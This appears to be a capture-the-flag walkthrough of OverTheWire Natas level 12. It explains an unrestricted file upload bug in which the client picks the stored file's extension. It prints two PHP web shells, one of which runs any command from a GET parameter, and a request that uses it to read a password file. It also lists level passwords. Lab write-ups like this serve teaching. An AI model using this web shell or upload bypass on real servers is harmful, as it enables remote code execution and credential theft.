Level 12 Username : natas12 Password : EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 URL : http://natas12.natas.labs.overthewire.org
To solve this level, we first log into the natas12 application using the credentials provided above.
As we can see, the application allows a user to upload JPEG files to the server with a maximum size of 1KB. I uploaded a small test image to the server, and the server responded with the location of the uploaded file.
Upon inspection of the page source and the Burp logs, we can see that the random filename is not chosen by the server at upload time: the upload form carries a hidden filename field pre-filled with a random name ending in .jpg, and the browser sends that field in the POST request together with the file.
On the server side the destination is built with makeRandomPath($dir, $ext), where the extension is taken from the filename value the client submitted. The application performs no check on the type or content of the uploaded file; it only enforces the size limit and then stores the file under a random name in the upload directory. Because a client-controlled value decides the extension, the application is vulnerable to ‘ Unrestricted File Upload ‘. Let’s create a new PHP file and put some code into it.
<?php $output = shell_exec('ls -lart'); echo "<pre>$output</pre>"; ?>
The name the application suggests ends in .jpg, and the server takes the extension from that value. To bypass this, we intercept the upload request in Burp and change the extension in the filename field from .jpg to .php, leaving the random part of the name intact. The file is then stored with a .php extension, and the web server executes it instead of serving it as an image.
After uploading, the application responds with the path of the new file, and requesting that path returns a listing of the files and folders in the upload directory, as intended.
Let’s modify the web shell so that it takes the command from the user instead of hardcoding it. We can then ask it to print the contents of /etc/natas_webpass/natas13.
<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>
The above web shell takes a command from the GET parameter cmd, runs it, and prints the output back to us. Let’s request ‘ http://natas12.natas.labs.overthewire.org/upload/pgfs4n9g3p.php?cmd=cat%20/etc/natas_webpass/natas13 ‘ (replace pgfs4n9g3p.php with the randomized filename the application generated for your upload) and voila! the application responds with the password for the next level.
Level 13 Username : natas13 Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY URL : http://natas13.natas.labs.overthewire.org